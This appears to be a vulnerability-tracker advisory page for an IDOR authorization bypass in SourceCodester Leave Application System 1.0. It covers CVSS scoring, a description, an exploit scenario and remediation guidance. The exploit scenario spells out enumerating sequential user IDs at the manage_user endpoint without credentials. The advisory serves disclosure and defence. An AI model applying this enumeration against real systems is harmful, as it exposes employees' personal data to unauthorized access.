EUVD-2026-18188
GHSA-x3j8-jq3m-7644
Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
4DescriptionCVE.org
A vulnerability was identified in SourceCodester Leave Application System 1.0. Impacted is an unknown function of the file /index.php?page=manage_user of the component User Information Handler. Such manipulation of the argument ID leads to authorization bypass. The attack can be executed remotely. The exploit is publicly available and might be used.
AnalysisAI
Remote authentication bypass in SourceCodester Leave Application System 1.0 allows unauthenticated attackers to access user information via insecure direct object reference (IDOR) in the /index.php?page=manage_user endpoint by manipulating the ID parameter. The vulnerability has a publicly available exploit and CVSS 5.3 (low-moderate confidentiality impact), though actual risk depends on the sensitivity of exposed user data and system context.
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Vulnerability AssessmentAI
| Risk Assessment | CVSS 5.3 (Network, Low Complexity, No Privileges, No User Interaction) combined with EPSS reporting and public exploit availability elevates real-world risk despite the moderate base score. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker sends HTTP GET requests to http://target/index.php?page=manage_user&ID=1, &ID=2, &ID=3, etc., iterating through sequential user IDs without providing authentication credentials. The vulnerable application returns user details (name, email, phone, role, leave balance) for each ID, allowing the attacker to enumerate all users and harvest sensitive personal or employment data. … |
| Remediation | Implement immediate input validation and authorization checks in the User Information Handler component: validate that the ID parameter corresponds to a user record the authenticated session is permitted to access, enforce role-based access control (RBAC) before returning user data, and regenerate or invalidate any session tokens if prior unauthorized access is suspected. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More from same product – last 7 days
Authentication bypass in Discuz! X5.0 releases 20260320 through 20260501 allows unauthenticated remote attackers to acce
Authenticated remote code execution in Discuz! X5.0 releases 20260320 through 20260501 allows administrators to chain a
Unauthenticated PHP Object Injection in the Happyforms WordPress plugin (versions <= 1.26.13) allows remote attackers to
Unauthenticated PHP Object Injection in the Broadcast Live Video WordPress plugin (versions prior to 7.1.3) allows remot
Unauthenticated PHP object injection in the WordPress plugin 'Integration for Keap/Infusionsoft and Contact Form 7, WPFo
Share
External POC / Exploit Code
Leaving vuln.today